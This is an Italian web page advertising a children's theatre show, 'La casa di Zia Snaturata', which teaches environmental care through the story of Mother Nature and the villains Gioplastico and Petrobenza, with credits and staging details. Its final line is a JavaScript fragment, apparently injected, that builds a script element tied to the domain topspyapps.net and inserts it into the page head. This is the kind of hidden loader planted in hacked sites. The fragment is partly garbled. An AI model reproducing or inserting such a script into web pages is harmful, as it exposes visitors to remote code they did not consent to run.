la casa di zia snaturata

 

La casa di Zia Snaturata

il rispetto per l’ambiente spiegato ai ragazzi

rivolto alle scuole elementari e medie


Madre Natura, Immacolata Snaturata, è anche zia, ma sua nipote Margherita Naftalina sembra non ne voglia sapere della sua famiglia.

Ma i pericoli che s’incontrano nel non rispettare la Natura, faranno riavvicinare zia e nipote unite insieme contro i nemici dell’ambiente, Gioplastico e Petrobenza, talmente infidi da nascondersi anche nelle nostre case.

Come potranno mai difendersi zia e nipote contro Petrolio e Plastica, padroni del mondo?Dovranno escogitare un piano…alternativo!

Grazie a questa quanto mai strana avventura potremo diventare persone coscienziose e in grado di salvaguardare la salute dell’ambiente in cui viviamo con piccoli accorgimenti alla portata di tutti. Vivere in modo più sano e consapevoli del mondo che ci circonda, diventa così, non tanto un modello di vita irraggiungibile ma una serie di comportamenti quotidiani facili ed economici.

E poi: e se finisse il petrolio??

MODALITA’

Genere: teatro di figura e teatro d’attore

Drammaturgia: Barbara Sinicco

Elaborazioni musicali: Chiara Minca

persone impiegate: 2 attrici e un tecnico

DATI TECNICI

Durata: 45 minuti

Numero attori: 2

Tempi montaggio/smontaggio: 1h

var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);d.getElementsByTagName('head')[0].appendChild(s);topspyapps.net